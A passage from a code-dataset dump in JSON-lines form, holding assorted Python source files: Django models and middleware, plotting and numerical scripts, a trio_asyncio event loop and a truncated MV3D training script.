models.TextField(blank=True)\n\n def next_test_date(self):\n if self.test_schedule == 0:\n return \"Doesn't require testing\"\n if not self.last_tested:\n return \"NEVER TESTED\"\n else:\n return self.last_tested + relativedelta(months=self.test_schedule)\n\n def test_overdue(self):\n if self.test_schedule == 0:\n return False\n if not self.last_tested:\n return True\n return self.next_test_date() < timezone.now().date()\n\n def __str__(self):\n return \"{} ({})\".format(self.system.name.split(\".\")[0], self.get_status_display())\n\n class Meta:\n ordering = (\"system__name\",)\n\n\nclass Vendor(models.Model):\n name = models.CharField(max_length=256, unique=True)\n details = models.TextField(blank=True)\n extra_data = JSONField(default=dict(), null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n\nclass SoftwareLicense(tracking.CommonFields):\n \"\"\"\n Represents a software licensing arrangement.\n \"\"\"\n name = models.CharField(max_length=256, unique=True)\n url = models.URLField(max_length=2000, null=True, blank=True)\n support = models.TextField(blank=True, help_text='Support timeframe or scope')\n support_url = models.URLField(max_length=2000, null=True, 
blank=True)\n oss = models.NullBooleanField(default=None, help_text='Open-source/free software license?')\n primary_user = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True)\n devices = models.ManyToManyField(Device, blank=True)\n vendor = models.ForeignKey(Vendor, on_delete=models.PROTECT, null=True, blank=True)\n used_licenses = models.PositiveSmallIntegerField(default=0, editable=False)\n available_licenses = models.PositiveSmallIntegerField(default=0, null=True, blank=True)\n license_details = models.TextField(blank=True, help_text=\"Direct license keys or details\")\n\n def __str__(self):\n return self.name\n\n\nclass BusinessService(models.Model):\n \"\"\"Represents the Department's core business services.\n \"\"\"\n number = models.PositiveIntegerField(unique=True, help_text='Service number')\n name = models.CharField(max_length=256, unique=True)\n description = models.TextField(null=True, blank=True)\n\n def __str__(self):\n return 'Service {}: {}'.format(self.number, self.name)\n\n\nclass BusinessFunction(models.Model):\n \"\"\"Represents a function of the Department, undertaken to meet the\n Department's core services. Each function must be linked to 1+\n BusinessService object.\n \"\"\"\n name = models.CharField(max_length=256, unique=True)\n description = models.TextField(null=True, blank=True)\n services = models.ManyToManyField(BusinessService)\n\n def __str__(self):\n return self.name\n\n\nclass BusinessProcess(models.Model):\n \"\"\"Represents a business process that the Department undertakes in order\n to fulfil one of the Department's functions.\n \"\"\"\n name = models.CharField(max_length=256, unique=True)\n description = models.TextField(null=True, blank=True)\n functions = models.ManyToManyField(BusinessFunction)\n criticality = models.PositiveIntegerField(\n choices=CRITICALITY_CHOICES, null=True, blank=True, help_text='How critical is the process?')\n\n class Meta:\n verbose_name_plural = 'business processes'\n\n def __str__(self):\n return self.name\n\n\nclass ProcessITSystemRelationship(models.Model):\n \"\"\"A model to represent the relationship between a BusinessProcess and an\n ITSystem object.\n \"\"\"\n process = models.ForeignKey(BusinessProcess, on_delete=models.PROTECT)\n itsystem = models.ForeignKey(ITSystem, on_delete=models.PROTECT)\n importance = models.PositiveIntegerField(\n choices=IMPORTANCE_CHOICES, help_text='How important is the IT System to undertaking this process?')\n\n class Meta:\n unique_together = ('process', 'itsystem')\n\n def __str__(self):\n return '{} - {} ({})'.format(self.itsystem.name, self.process.name, self.get_importance_display())\n\n\nclass ITSystemDependency(models.Model):\n \"\"\"A model to represent a dependency that an ITSystem has on another, plus\n the criticality of that dependency.\n \"\"\"\n itsystem = models.ForeignKey(\n ITSystem, on_delete=models.PROTECT, verbose_name='IT System', help_text='The IT System')\n dependency = models.ForeignKey(\n ITSystem, on_delete=models.PROTECT, related_name='dependency',\n help_text='The system which is depended upon by the IT System')\n criticality = models.PositiveIntegerField(\n choices=CRITICALITY_CHOICES, help_text='How critical is the dependency?')\n\n class Meta:\n verbose_name = 'IT System dependency'\n verbose_name_plural = 'IT System dependencies'\n unique_together = ('itsystem', 'dependency')\n\n def __str__(self):\n return '{} - {} ({})'.format(self.itsystem.name, self.dependency.name, 
self.get_criticality_display())\n","sub_path":"registers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":25168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"129952559","text":"#vim: set ai tw=79 expandtab tabstop=4:\n\nimport sys\n\nnum1 = int(sys.argv[1]) \ndenom1 = int(sys.argv[2]) \nnum2 = int(sys.argv[3]) \ndenom2 = int(sys.argv[4]) \n\nif(denom1 != 0 and denom2 != 0):\n num_out = num1*denom2 + num2*denom1\n denom_out = denom1*denom2\n\n#### Extra Credit ####\n f = 1 # f = potential common factor\n while f <= abs(denom_out): # Why the `abs'?\n if denom_out % f == 0 and num_out % f == 0:\n gcf = f\n f += 1\n num_out //= gcf\n denom_out //= gcf\n######################\n\n print(num_out)\n print(denom_out)\n\nelse:\n print(\"Undefined: Zero demoninator\")\n","sub_path":"csc280/coursework/0908/fraction_adder.py","file_name":"fraction_adder.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"470425600","text":"import App\ndef CreateAI(pShip):\n\n\t#########################################\n\t# Creating CompoundAI BasicAttackMarauder at (48, 163)\n\timport AI.Compound.BasicAttack\n\tpBasicAttackMarauder = AI.Compound.BasicAttack.CreateAI(pShip, \"Marauder\", Difficulty = 0.9)\n\t# Done creating CompoundAI BasicAttackMarauder\n\t#########################################\n\t#########################################\n\t# Creating PlainAI WarpOut at (156, 161)\n\tpWarpOut = App.PlainAI_Create(pShip, \"WarpOut\")\n\tpWarpOut.SetScriptModule(\"Warp\")\n\tpWarpOut.SetInterruptable(1)\n\t# Done creating PlainAI WarpOut\n\t#########################################\n\t#########################################\n\t# Creating SequenceAI Sequence at (23, 260)\n\tpSequence = App.SequenceAI_Create(pShip, \"Sequence\")\n\tpSequence.SetInterruptable(1)\n\tpSequence.SetLoopCount(1)\n\tpSequence.SetResetIfInterrupted(1)\n\tpSequence.SetDoubleCheckAllDone(0)\n\tpSequence.SetSkipDormant(0)\n\t# SeqBlock is at (145, 241)\n\tpSequence.AddAI(pBasicAttackMarauder)\n\tpSequence.AddAI(pWarpOut)\n\t# Done creating SequenceAI Sequence\n\t#########################################\n\t#########################################\n\t# Creating PreprocessingAI RedAlert at (19, 309)\n\t## Setup:\n\timport AI.Preprocessors\n\tpScript = AI.Preprocessors.AlertLevel(App.ShipClass.RED_ALERT)\n\t## The PreprocessingAI:\n\tpRedAlert = App.PreprocessingAI_Create(pShip, \"RedAlert\")\n\tpRedAlert.SetInterruptable(1)\n\tpRedAlert.SetPreprocessingMethod(pScript, \"Update\")\n\tpRedAlert.SetContainedAI(pSequence)\n\t# Done creating PreprocessingAI RedAlert\n\t#########################################\n\t#########################################\n\t# Creating PreprocessingAI AvoidObstacles at (18, 360)\n\t## Setup:\n\timport AI.Preprocessors\n\tpScript = AI.Preprocessors.AvoidObstacles()\n\t## The PreprocessingAI:\n\tpAvoidObstacles = App.PreprocessingAI_Create(pShip, \"AvoidObstacles\")\n\tpAvoidObstacles.SetInterruptable(1)\n\tpAvoidObstacles.SetPreprocessingMethod(pScript, \"Update\")\n\tpAvoidObstacles.SetContainedAI(pRedAlert)\n\t# Done creating PreprocessingAI AvoidObstacles\n\t#########################################\n\treturn 
pAvoidObstacles\n","sub_path":"scripts/Maelstrom/Episode2/E2M2/E2M2_AI_GalorDetect.py","file_name":"E2M2_AI_GalorDetect.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"80999557","text":"from cx_Freeze import setup, Executable\n\ninc=[]\ninc.append(\"sip\")\ninc.append(\"PyQt4.QtCore\")\ninc.append(\"PyQt4.QtGui\")\ninc.append(\"LauePlaneCfg\")\ninc.append(\"StereoCfg\")\n\nopts=dict(includes=inc,\n icon=\"icons/clip.ico\",\n compressed=True,\n base=\"Win32GUI\",\n append_script_to_exe=True,\n optimize=1)\n\n\nsetup(\n name = \"Clip\",\n version = \"3.0c\",\n description = \"The Cologne Laue Indexation Program\",\n executables = [Executable(\"clip.py\")],\n options={\"build_exe\": opts})\n\n","sub_path":"tags/release-1.0beta3/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"554549333","text":"''' 绘制散点图 '''\nimport matplotlib.pyplot as plt\n\ninput_squares = list(range(1001))\nsquares = [x**2 for x in input_squares]\n\n''' 显示点,需要传入一对x,y坐标值 '''\nplt.scatter(input_squares,squares,s=10,edgecolors='none',c='red') \n# s参数代表点的大小,edgecolors='none'代表弄掉点的轮廓,c代表点的颜色\n# 设置颜色映射,用法: 将数据集传给c,然后增加cmap参数,设置整个数据集怎么变\n# plt.cm.Blues 代表值小的点颜色浅,值大的点颜色深\n\n''' 要了解pyplot中所有的颜色映射,访问:http://matplotlib.org/,单机Examples,向下滚动到\n Color Examples,再点击colormaps_reference \n'''\nplt.scatter(input_squares,squares,s=10,edgecolors='none',c=squares,cmap=plt.cm.Blues)\n''' 设置图参数 '''\nplt.title(\"Square Numbers\",fontsize=24) # 设置图像的标题\nplt.xlabel(\"Value\",fontsize=14) # 设置x轴的标签 \nplt.ylabel(\"Square of Value\",fontsize=14) # 设置y轴的标签\n\n''' 设置刻度标记的大小 '''\nplt.tick_params(axis='both',which='major',labelsize=14)\n''' 显示散点图 '''\nplt.show()\n\n''' 保存图表 '''\n#plt.savefig('1.png',bbox_inches='tight')\n''' 第一个参数是以什么名字保存,第二个参数是省去空白部分 '''","sub_path":"matplotlib/example1/c2.py","file_name":"c2.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"226854586","text":"import datetime as dt\nimport pandas as pd\nimport requests \n\nyesterday = dt.date.today() - dt.timedelta(days=1)\n\napi_url = 'https://earthquake.usgs.gov/fdsnws/event/1/query'\n\napi_args = {\n 'format': 'geojson',\n 'starttime' : yesterday - dt.timedelta(days=30),\n 'endtime' : yesterday\n}\n\nresponse = requests.get(api_url, params=api_args)\nprint(response)\n\nearthquake_json = response.json()\n#print(earthquake_json.keys()) \nprint(earthquake_json['metadata'])\n","sub_path":"Ch02/ch02_api.py","file_name":"ch02_api.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"201307456","text":"from django.conf import settings\nfrom django.conf.urls import url, include\nfrom rest_framework import routers\nfrom rest_framework_jwt.views import obtain_jwt_token, refresh_jwt_token, verify_jwt_token\n\nfrom yaapi import views as yaapi_view\nfrom yacommon import views as yacommon_view\n\nrouter = routers.DefaultRouter()\n\nurlpatterns = [\n url(r'account/api-auth', include('rest_framework.urls', namespace='rest_framework')),\n url(r'account/api-token-auth', obtain_jwt_token),\n url(r'account/api-token-refresh', refresh_jwt_token),\n url(r'account/api-token-verify', verify_jwt_token),\n url(r'system/info', yacommon_view.SystemInfo.as_view(), name='system_info'),\n 
url(r'blog/resume', yacommon_view.ResumeInfo.as_view(), name='resume_info'),\n url(r\"^\", include(router.urls)),\n]\n\nif settings.DEBUG:\n # This allows the error pages to be debugged during development, just visit\n # these url in browser to see how these error pages look like.\n urlpatterns += [\n url(r'all', yaapi_view.APIRootView.as_view(), name='all_api'),\n ]\n","sub_path":"yadjangoweb/yaapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"359334938","text":"import sentencepiece as spm\nimport torch\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport torch.nn as nn\n# vocab loading\nvocab_file = \"/Users/a60058238/Desktop/dev/workspace/nlp-study/Data/kowiki/kowiki.model\"\nvocab = spm.SentencePieceProcessor()\nvocab.load(vocab_file)\n\n# 입력 texts\nlines = [\n \"겨울은 추워요.\",\n \"감기 조심하세요.\"\n]\n\n# text를 tensor로 변환\ninputs = []\nfor line in lines:\n pieces = vocab.encode_as_pieces(line)\n ids = vocab.encode_as_ids(line)\n inputs.append(torch.tensor(ids))\n print(pieces)\n\n# 입력 길이가 다르므로 입력 최대 길이에 맟춰 padding(0)을 추가 해 줌\ninputs = torch.nn.utils.rnn.pad_sequence(inputs, batch_first=True, padding_value=0)\n# shape\nprint(inputs.size())\n# 값\nprint(inputs)\n\nn_vocab = len(vocab) # vocab count\nd_hidn = 128 # hidden size\nnn_emb = torch.nn.Embedding(n_vocab, d_hidn) # embedding 객체\n\ninput_embs = nn_emb(inputs) # input embedding\nprint(input_embs.size())\n\n\"\"\" sinusoid position embedding \"\"\"\ndef get_sinusoid_encoding_table(n_seq, d_hidn):\n def cal_angle(position, i_hidn):\n return position / np.power(10000, 2 * (i_hidn // 2) / d_hidn)\n def get_posi_angle_vec(position):\n return [cal_angle(position, i_hidn) for i_hidn in range(d_hidn)]\n\n sinusoid_table = np.array([get_posi_angle_vec(i_seq) for i_seq in range(n_seq)])\n sinusoid_table[:, 0::2] = np.sin(sinusoid_table[:, 0::2]) # even index sin\n sinusoid_table[:, 1::2] = np.cos(sinusoid_table[:, 1::2]) # odd index cos\n\n return sinusoid_table\n\n# position encoding 구하는 절\nn_seq = 64\npos_encoding = get_sinusoid_encoding_table(n_seq, d_hidn)\n\nprint (pos_encoding.shape) # 크기 출력\nplt.pcolormesh(pos_encoding, cmap='RdBu')\nplt.xlabel('Depth')\nplt.xlim((0, d_hidn))\nplt.ylabel('Position')\nplt.colorbar()\nplt.show()\n\npos_encoding = torch.FloatTensor(pos_encoding)\nnn_pos = torch.nn.Embedding.from_pretrained(pos_encoding, freeze=True)\n\npositions = torch.arange(inputs.size(1), device=inputs.device, dtype=inputs.dtype).expand(inputs.size(0), inputs.size(1)).contiguous() + 1\npos_mask = inputs.eq(0)\n\npositions.masked_fill_(pos_mask, 0)\npos_embs = nn_pos(positions) # position embedding\n\nprint(inputs)\nprint(positions)\nprint(pos_embs.size())\n\n# Transformer에 사용될 입력\n# input embedding과 postion embedding의 합으로 input_sums 생\ninput_sums = input_embs + pos_embs\n\n#Scale Dot Product Attention에서 입력으로 사용될 Q, K, V\n# Scale Dot Product Attention의 경우 MatMul(softmax(mask(scale(matmul(Q,K), V)\n#\nQ = input_sums\nK = input_sums\nV = input_sums\nattn_mask = inputs.eq(0).unsqueeze(1).expand(Q.size(0), Q.size(1), K.size(1))\nprint(attn_mask.size())\nprint(attn_mask[0])\n\n# softmax(Q * k^T / K-dimension) * V 수식의 Q * K-transpose 계산분\n# matmul(Q,K) 부분\nscores = torch.matmul(Q, K.transpose(-1, -2))\nprint(scores.size())\nprint(scores[0])\n\n# softmax(Q * k^T / K-dimension) * V 수식의 d_head**0.5\n# scale 하는 부\nd_head = 64\nscores = scores.mul_(1/d_head**0.5)\nprint(scores.size())\nprint(scores[0])\n\n# 
Mask(opt) 하는 부분\nscores.masked_fill_(attn_mask, -1e9)\nprint(scores.size())\nprint(scores[0])\n\n#Softmax\nattn_prob = nn.Softmax(dim=-1)(scores)\nprint(attn_prob.size())\nprint(attn_prob[0])\n\n# attn_prov * V\n# attn_prov는 MatMul(softmax(mask(scale(matmul(Q,K), V)에서\n# softmax(mask(scale(matmul(Q,K)) 부분에 해당한다.\ncontext = torch.matmul(attn_prob, V)\nprint(context.size())\n\n\nW_Q = nn.Linear(d_hidn, n_head * d_head)\nW_K = nn.Linear(d_hidn, n_head * d_head)\nW_V = nn.Linear(d_hidn, n_head * d_head)\n\n# (bs, n_seq, n_head * d_head)\nq_s = W_Q(Q)\nprint(q_s.size())\n# (bs, n_seq, n_head, d_head)\nq_s = q_s.view(batch_size, -1, n_head, d_head)\nprint(q_s.size())\n# (bs, n_head, n_seq, d_head)\nq_s = q_s.transpose(1,2)\nprint(q_s.size())\n\n\n\n\n","sub_path":"ETC/inputEmbedding.py","file_name":"inputEmbedding.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"180715711","text":"from django.conf import settings\n\nfrom account.models import AdminProfile, EmployerProfile, StudentProfile\n\n__all__ = (\n 'UserProfileMiddleware'\n)\n\n\nclass UserProfileMiddleware(object):\n\n def process_request(self, request):\n \"\"\"Add related profile of user to request object\"\"\"\n if request.user.is_authenticated():\n role_type = request.session.get('role_type', None)\n\n if role_type == settings.ROLE_TYPES.get('admin'):\n request.user_profile = AdminProfile.objects.get(user_id=request.user.id)\n\n elif role_type == settings.ROLE_TYPES.get('employer'):\n request.user_profile = EmployerProfile.objects.get(user_id=request.user.id)\n\n elif role_type == settings.ROLE_TYPES.get('student'):\n request.user_profile = StudentProfile.objects.get(user_id=request.user.id)\n\n request.session['role_type'] = role_type\n\n return","sub_path":"account/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"397893605","text":"import numpy as np\nimport cv2\n\n\ndef main_process(img, center_tally):\n mask_zero_area = create_mask_zero_area(img, center_tally)\n zero_area_binary = create_binary(mask_zero_area, img)\n zero_coords = get_zero_coordinates(zero_area_binary)\n\n if zero_coords is None:\n return center_tally\n return zero_coords\n\n\ndef create_mask_zero_area(img, center_tally):\n W, H = img.shape[:2]\n mask = np.zeros((W, H), np.uint8)\n\n size_boundaries = int(W * 0.015)\n\n mask[\n center_tally[1] - size_boundaries: center_tally[1],\n center_tally[0] - size_boundaries: center_tally[0] + size_boundaries] = 1\n\n return mask\n\n\ndef create_binary(mask_zero_area, img):\n\n img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n channels = cv2.split(img_hsv)\n value = channels[2] * mask_zero_area\n\n mean_masked_value = np.mean(np.ma.masked_where(value == 0, value))\n std_masked_value = np.std(np.ma.masked_where(value == 0, value))\n\n bin = cv2.inRange(value, 0, mean_masked_value - (1.5 * std_masked_value)) * mask_zero_area\n\n return bin\n\n\ndef get_zero_coordinates(zero_binary_area):\n\n contours, hir = cv2.findContours(zero_binary_area, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE) # Contour Detection\n\n if len(contours) is 0:\n return None\n\n areas = [cv2.contourArea(c) for c in contours]\n max_index = np.argmax(areas)\n cnt = contours[max_index]\n\n M = cv2.moments(cnt)\n try:\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n return (cx, cy)\n except Exception:\n return 
None\n\n","sub_path":"backend/processing/image_processing/dial/zero.py","file_name":"zero.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"284444515","text":"'''\nYour function should take in a signle parameter (a string `word`)\nYour function should return a count of how many occurences of ***\"th\"*** occur within `word`. Case matters.\nYour function must utilize recursion. It cannot contain any loops.\n'''\ndef count_th(word):\n if 'th' in word:\n count = 1\n index = word.find('th') + 2\n remaining_word = word[index:]\n return count + count_th(remaining_word)\n else:\n count = 0\n return count\n\n\n# Or you could just do\n\n# def count_th(word):\n# return word.count('th')","sub_path":"recursive_count_th/count_th.py","file_name":"count_th.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"362416347","text":"\ngrades = [75,66,84,90,92,100,38,73,22,95]\ncount = 10\n\ni = 0\ntotal = 0\nwhile True:\n if i >= count:\n break\n v = grades[i]\n total = total + v\n i = i + 1\n \n \navg = total / count\n\nprint(avg)","sub_path":"Topics/01_Encapsulation/01_01.5_Compiling/grades1.py","file_name":"grades1.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"398631192","text":"\"\"\"Helper functions to use within OpsDroid.\"\"\"\n\nimport os\nimport stat\nimport shutil\nimport logging\nimport filecmp\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef get_opsdroid():\n \"\"\"Return the running opsdroid instance.\"\"\"\n from opsdroid.core import OpsDroid\n if len(OpsDroid.instances) == 1:\n return OpsDroid.instances[0]\n\n return None\n\n\ndef del_rw(action, name, exc):\n \"\"\"Error handler for removing read only files.\"\"\"\n os.chmod(name, stat.S_IWRITE)\n os.remove(name)\n\n# This is meant to provide backwards compatibility for versions\n# prior to 0.12.0 in the future this will probably be deleted\n\n\ndef move_config_to_appdir(src, dst):\n \"\"\"Copy any .yaml extension in \"src\" to \"dst\" and remove from \"src\".\"\"\"\n yaml_files = [file for file in os.listdir(src)\n if '.yaml' in file[-5:]]\n\n if not os.path.isdir(dst):\n os.mkdir(dst)\n\n for file in yaml_files:\n original_file = os.path.join(src, file)\n copied_file = os.path.join(dst, file)\n shutil.copyfile(original_file, copied_file)\n _LOGGER.info(_('File %s copied from %s to %s '\n 'run opsdroid -e to edit the '\n 'main config file'), file,\n src, dst)\n if filecmp.cmp(original_file, copied_file):\n os.remove(original_file)\n","sub_path":"opsdroid/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"455052983","text":"# This code implements a clone of the asyncio mainloop which hooks into\n# Trio.\n\nimport sys\nimport trio\nimport asyncio\nimport warnings\nimport threading\n\nfrom .util import run_future\nfrom .async_ import TrioEventLoop, open_loop\n\ntry:\n from trio.hazmat import wait_for_child\nexcept ImportError:\n from .child import wait_for_child\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n__all__ = [\n 'run',\n 'run_trio_task',\n 'run_trio',\n 'run_future',\n 'run_coroutine',\n 'run_asyncio',\n 'TrioChildWatcher',\n 'TrioPolicy',\n]\n\n\nclass 
_TrioPolicy(asyncio.events.BaseDefaultEventLoopPolicy):\n _loop_factory = TrioEventLoop\n\n def __init__(self):\n super().__init__()\n self._trio_local = trio.hazmat.RunLocal(_loop=None, _task=False)\n\n def new_event_loop(self):\n try:\n trio.hazmat.current_task()\n except RuntimeError:\n if 'pytest' not in sys.modules:\n warnings.warn(\n \"trio_asyncio should be used from within a Trio event loop.\",\n DeprecationWarning,\n stacklevel=2\n )\n from .sync import SyncTrioEventLoop\n loop = SyncTrioEventLoop()\n return loop\n else:\n raise RuntimeError(\n \"You're within a Trio environment.\\n\"\n \"Use 'async with open_loop()' instead.\"\n )\n\n def get_event_loop(self):\n \"\"\"Get the current event loop.\n\n Note that this will auto-generate an event loop if none exists, for\n compatibility with asyncio.\n\n To get a Trio-compatible asyncio loop, use\n ``async with trio_asyncio.open_loop() as loop:``.\n\n To test whether an event loop is running, check the loop policy's\n ``.current_event_loop`` property.\n \"\"\"\n try:\n trio.hazmat.current_task()\n except RuntimeError: # no Trio task is active\n # this creates a new loop in the main task\n return super().get_event_loop()\n else:\n return self._trio_local._loop\n\n @property\n def current_event_loop(self):\n \"\"\"The currently-running event loop, if one exists.\"\"\"\n try:\n return self._trio_local._loop\n except RuntimeError:\n # in the main thread this would create a new loop\n # return super().get_event_loop()\n return self._local._loop\n\n def set_event_loop(self, loop):\n \"\"\"Set the current event loop.\"\"\"\n try:\n task = trio.hazmat.current_task()\n except RuntimeError:\n return super().set_event_loop(loop)\n\n # This test will not trigger if you create a new asyncio event loop\n # in a sub-task, which is exactly what we intend to be possible\n if self._trio_local._loop is not None and loop is not None and \\\n self._trio_local._task == task:\n raise RuntimeError('You cannot replace an event loop.')\n self._trio_local._loop = loop\n self._trio_local._task = task\n\n\nclass TrioPolicy(_TrioPolicy, asyncio.DefaultEventLoopPolicy):\n def _init_watcher(self):\n with asyncio.events._lock:\n if self._watcher is None: # pragma: no branch\n self._watcher = TrioChildWatcher()\n if isinstance(threading.current_thread(), threading._MainThread):\n self._watcher.attach_loop(self._trio_local._loop)\n\n if self._watcher is not None and \\\n isinstance(threading.current_thread(), threading._MainThread):\n self._watcher.attach_loop(self._trio_local._loop)\n\n def set_child_watcher(self, watcher):\n if watcher is not None:\n if not isinstance(watcher, TrioChildWatcher):\n # raise RuntimeError(\"You must use a TrioChildWatcher here. 
\"\n # \"Sorry.\")\n # warnings.warn(\"You must use a TrioChildWatcher.\")\n #\n loop = watcher._loop # ugh.\n watcher.close()\n watcher = TrioChildWatcher()\n watcher.attach_loop(loop)\n super().set_child_watcher(watcher)\n\n\nclass TrioChildWatcher: # (asyncio.AbstractChildWatcher):\n # AbstractChildWatcher not available under Windows\n def __init__(self):\n super().__init__()\n self._callbacks = {} # pid => handler\n\n def attach_loop(self, loop):\n self._loop = loop\n\n async def _waitpid(self, pid, callback, *args):\n returncode = await wait_for_child(pid)\n callback(pid, returncode, *args)\n\n def add_child_handler(self, pid, callback, *args):\n \"\"\"Add a callback to run when a child process terminates.\"\"\"\n h = self._loop.run_trio(self._waitpid, pid, callback, *args)\n self._callbacks[pid] = h\n\n def remove_child_handler(self, pid):\n \"\"\"Remove the callback to run when a child process terminates.\"\"\"\n h = self._callbacks.pop(pid, None)\n if h is None:\n return False\n h.cancel()\n return True\n\n def close(self):\n for pid in list(self._callbacks):\n h = self._callbacks.pop(pid, None)\n if h is None:\n continue\n h.cancel()\n self._loop = None\n\n def __enter__(self):\n return self\n\n def __exit__(self, *tb):\n self.close()\n\n\nasync def run_asyncio(proc, *args):\n loop = asyncio.get_event_loop()\n if not isinstance(loop, TrioEventLoop):\n raise RuntimeError(\"Need to run in a trio_asyncio.open_loop() context\")\n return await loop.run_asyncio(proc, *args)\n\n\nasync def run_coroutine(fut, scope=None):\n loop = asyncio.get_event_loop()\n if not isinstance(loop, TrioEventLoop):\n raise RuntimeError(\"Need to run in a trio_asyncio.open_loop() context\")\n return await loop.run_coroutine(fut, scope=scope)\n\n\ndef run_trio(proc, *args):\n \"\"\"Call an asynchronous Trio function from asyncio.\n\n Returns a Future with the result / exception.\n\n Cancelling the future will cancel the Trio task running your\n function, or prevent it from starting if that is still possible.\n\n You need to handle errors yourself.\n \"\"\"\n loop = asyncio.get_event_loop()\n if not isinstance(loop, TrioEventLoop): # pragma: no cover\n raise RuntimeError(\"Need to run in a trio_asyncio.open_loop() context\")\n return loop.run_trio(proc, *args)\n\n\ndef run_trio_task(proc, *args):\n \"\"\"Call an asynchronous Trio function from sync context.\n\n This method queues the task and returns immediately.\n It does not return a value.\n\n An uncaught error will propagate to, and terminate, the trio-asyncio loop.\n \"\"\"\n loop = asyncio.get_event_loop()\n if not isinstance(loop, TrioEventLoop):\n raise RuntimeError(\"Need to run in a trio_asyncio.open_loop() context\")\n loop.run_trio_task(proc, *args)\n\n\ndef run(proc, *args, queue_len=None):\n \"\"\"Like :func:`trio.run`, but adds a context that supports asyncio.\n \"\"\"\n\n async def _run_task(proc, args):\n async with open_loop(queue_len=queue_len):\n return await proc(*args)\n\n trio.run(_run_task, proc, args)\n\n\nasyncio.set_event_loop_policy(TrioPolicy())\n","sub_path":"trio_asyncio/loop.py","file_name":"loop.py","file_ext":"py","file_size_in_byte":7229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"478166927","text":"# Script of derivate computation several h's\n# single point method\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef dfdx(f,x,h):\n return (f(x + h) - f(x - h))/(2*h)\n\nn = 200\nx = np.linspace(0, np.pi /50, n + 1)\nh1 = (np.pi /50 )/ n\nepsilon = 5e-324\nho 
= np.sqrt( (4*epsilon*100)/(10000))\n\n\ndef sin100x(x):\n return np.sin(100*x)\n\ndydx_1 = dfdx(sin100x,x,h1)\ndydx_2 = dfdx(sin100x,x,ho)\n\ndYdx = 100*np.cos(100*x)\n\n#plt.figure(figsize=(12,5))\nplt.plot(x,dydx_1,'.',label='Approx with adjusting h')\nplt.plot(x,dydx_2,'.',label='Approx with optimal h')\n\nplt.plot(x,dYdx,'b',label='Exact Value')\n\nplt.title('Derivative of y = cos(100x)')\nplt.legend(loc='best')\nplt.show()\n","sub_path":"diff_comp_singlepoint.py","file_name":"diff_comp_singlepoint.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"644720849","text":"import mv3d\nimport mv3d_net\nimport glob\nfrom config import *\nimport utils.batch_loading as ub\nimport argparse\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='training')\n\n all= '%s,%s,%s' % (mv3d_net.top_view_rpn_name ,mv3d_net.imfeature_net_name,mv3d_net.fusion_net_name)\n\n parser.add_argument('-w', '--weights', type=str, nargs='?', default='',\n help='use pre trained weigthts example: -w \"%s\" ' % (all))\n\n parser.add_argument('-t', '--targets', type=str, nargs='?', default=all,\n help='train targets example: -w \"%s\" ' % (all))\n\n parser.add_argument('-i', '--max_iter', type=int, nargs='?', default=1000,\n help='max count of train iter')\n\n parser.add_argument('-n', '--tag', type=str, nargs='?', default='unknown_tag',\n help='set log tag')\n\n parser.add_argument('-c', '--continue_train', type=bool, nargs='?', default=False,\n help='set continue train flag')\n args = parser.parse_args()\n\n print('\\n\\n{}\\n\\n'.format(args))\n tag = args.tag\n if tag == 'unknown_tag':\n tag = input('Enter log tag : ')\n print('\\nSet log tag :\"%s\" ok !!\\n' %tag)\n\n max_iter = args.max_iter\n weights=[]\n if args.weights != '':\n weights = args.weights.split(',')\n\n targets=[]\n if args.targets != '':\n targets = args.targets.split(',')\n\n dataset_dir = cfg.PREPROCESSED_DATA_SETS_DIR\n\n if cfg.DATA_SETS_TYPE == 'didi' or cfg.DATA_SETS_TYPE == 'test':\n training_dataset = {\n '1': ['6_f', '9_f', '10', '13', '20', '21_f', '15', '19'],\n '2': ['3_f', '6_f', '8_f'],\n '3': ['2_f', '4', '6', '8', '7', 